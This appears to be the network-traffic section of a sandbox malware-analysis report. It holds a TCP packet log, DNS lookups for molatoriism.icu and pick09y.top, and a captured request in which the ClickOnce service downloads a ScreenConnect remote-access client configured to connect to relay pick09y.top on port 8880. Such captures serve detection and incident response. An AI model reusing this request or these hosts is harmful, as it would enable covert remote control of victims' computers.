                                                                                                                                                                              Nov 7, 2024 18:04:48.101716042 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.101763010 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.101769924 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.101805925 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.102394104 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.102448940 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.102451086 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.102459908 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.102488995 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.102524996 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.102571964 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.102576971 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.102612972 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.103097916 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.103157043 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.103245020 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.103296041 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.103914022 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.103976011 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.103980064 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.103990078 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.104017973 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.104033947 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.104075909 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.104084015 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.104120016 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.104846954 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.104906082 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.144296885 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.144475937 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.216789961 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.216842890 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.216882944 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.216928005 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.217029095 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.217029095 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.217029095 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.217057943 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.217103958 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.217576027 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.217631102 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.217704058 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.217752934 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.217981100 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.218033075 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.218055010 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.218099117 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.218158960 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.914155960 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.914163113 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.914200068 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.914216042 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.024466038 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.024485111 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.024555922 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.024574041 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.024619102 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.024986982 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.025002956 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.025041103 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.025047064 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.025072098 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.025103092 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.025665045 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.025681973 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.025727987 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.025736094 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.025754929 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.025844097 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.026757956 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.026787043 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.026819944 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.026825905 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.026855946 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.026871920 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.067998886 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.068022013 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.068089008 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.068109035 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.068133116 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.068142891 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.344959974 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.344989061 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.345040083 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.345065117 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.345084906 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.345155001 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.345185995 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.345199108 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.345206976 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.345230103 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.345237970 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.345242023 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.345264912 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.345304012 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.400969028 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.427010059 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.427047968 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:49.427119970 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.427803040 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:49.427818060 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.044266939 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.046001911 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.046015978 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.341300011 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.344091892 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.344120979 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.344160080 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.344173908 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.344201088 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.344217062 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.344475985 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.344520092 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.344521046 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.344530106 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.344572067 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.344580889 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.386400938 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.386410952 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.433299065 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.461672068 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.461781025 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.463062048 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.463069916 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.492177963 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.492213964 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.492248058 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.492252111 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.492259026 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.492299080 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.492516041 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.492690086 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.503953934 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.558243036 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.558267117 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.579473019 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.579577923 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.579605103 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.609724998 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.609760046 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.609781027 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.609793901 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.609805107 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.609844923 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.610055923 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.610107899 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.610124111 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.623423100 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.623455048 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.623483896 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.623508930 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.623594046 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.697134018 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.727678061 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.727718115 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.727751017 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.727782965 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.727792978 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.727817059 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.727832079 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.727859020 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:50.727864027 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:50.727922916 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.409739971 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.409763098 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.409818888 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.409826040 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.409872055 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.526627064 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.526647091 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.526701927 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.526710987 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.526722908 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.526741982 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.527581930 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.527620077 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.527656078 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.527662992 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.527687073 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.527698040 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.676400900 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.676423073 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.676465034 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.676474094 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.676485062 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.676522970 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.677191973 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.677210093 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.677256107 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.677262068 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.677277088 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.677297115 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.794049025 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.794070959 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.794199944 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.794212103 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.794250965 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.795022964 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.795038939 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.795097113 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.795106888 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.797306061 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.857289076 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.857306957 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.857393026 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.857403994 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.857445955 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.912440062 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.912460089 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.912553072 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.912580013 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.913394928 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.923677921 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.923701048 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.923755884 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.923764944 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:52.923799992 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:52.923816919 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:53.029647112 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:53.029675007 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:53.029721975 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:53.029733896 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:53.029762983 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:53.029782057 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:53.030520916 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:53.030586004 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:53.030591965 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:53.030625105 CET44349808172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:53.030683994 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:53.031153917 CET49808443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:56.876944065 CET498488880192.168.2.562.182.85.100
                                                                                                                                                                              Nov 7, 2024 18:04:56.881887913 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:56.881978035 CET498488880192.168.2.562.182.85.100
                                                                                                                                                                              Nov 7, 2024 18:04:58.197540998 CET498488880192.168.2.562.182.85.100
                                                                                                                                                                              Nov 7, 2024 18:04:58.203531981 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:58.472378969 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:58.495964050 CET498488880192.168.2.562.182.85.100
                                                                                                                                                                              Nov 7, 2024 18:04:58.501065969 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:58.771666050 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:58.771948099 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:58.772002935 CET498488880192.168.2.562.182.85.100
                                                                                                                                                                              Nov 7, 2024 18:04:59.767509937 CET498488880192.168.2.562.182.85.100
                                                                                                                                                                              Nov 7, 2024 18:04:59.767566919 CET498488880192.168.2.562.182.85.100
                                                                                                                                                                              Nov 7, 2024 18:04:59.772528887 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:59.772542953 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:59.772551060 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:59.772648096 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:59.772737980 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:59.773030996 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:05:59.777234077 CET498488880192.168.2.562.182.85.100
                                                                                                                                                                              Nov 7, 2024 18:05:59.782416105 CET88804984862.182.85.100192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:06:59.792860031 CET498488880192.168.2.562.182.85.100
                                                                                                                                                                              Nov 7, 2024 18:06:59.797925949 CET88804984862.182.85.100192.168.2.5
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| --- | --- | --- | --- | --- |
| Nov 7, 2024 18:04:18.185209990 CET | 53940 | 53 | 192.168.2.5 | 1.1.1.1 |
| Nov 7, 2024 18:04:18.234338045 CET | 53 | 53940 | 1.1.1.1 | 192.168.2.5 |
| Nov 7, 2024 18:04:56.052102089 CET | 62808 | 53 | 192.168.2.5 | 1.1.1.1 |
| Nov 7, 2024 18:04:56.815988064 CET | 53 | 62808 | 1.1.1.1 | 192.168.2.5 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Nov 7, 2024 18:04:18.185209990 CET | 192.168.2.5 | 1.1.1.1 | 0x73d5 | Standard query (0) | molatoriism.icu | A (IP address) | IN (0x0001) | false |
| Nov 7, 2024 18:04:56.052102089 CET | 192.168.2.5 | 1.1.1.1 | 0x304 | Standard query (0) | pick09y.top | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Nov 7, 2024 18:04:18.234338045 CET | 1.1.1.1 | 192.168.2.5 | 0x73d5 | No error (0) | molatoriism.icu | | 172.67.182.214 | A (IP address) | IN (0x0001) | false |
| Nov 7, 2024 18:04:18.234338045 CET | 1.1.1.1 | 192.168.2.5 | 0x73d5 | No error (0) | molatoriism.icu | | 104.21.96.148 | A (IP address) | IN (0x0001) | false |
| Nov 7, 2024 18:04:24.040889978 CET | 1.1.1.1 | 192.168.2.5 | 0xfb42 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 7, 2024 18:04:24.040889978 CET | 1.1.1.1 | 192.168.2.5 | 0xfb42 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false |
| Nov 7, 2024 18:04:25.935441971 CET | 1.1.1.1 | 192.168.2.5 | 0x5418 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 7, 2024 18:04:25.935441971 CET | 1.1.1.1 | 192.168.2.5 | 0x5418 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false |
| Nov 7, 2024 18:04:56.815988064 CET | 1.1.1.1 | 192.168.2.5 | 0x304 | No error (0) | pick09y.top | | 62.182.85.100 | A (IP address) | IN (0x0001) | false |
                                                                                                                                                                              • molatoriism.icu
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.5 | 49705 | 172.67.182.214 | 443 | 7120 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe |
Timestamp | Bytes transferred | Direction | Data
2024-11-07 17:04:19 UTC | 617 | OUT | GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              Connection: Keep-Alive
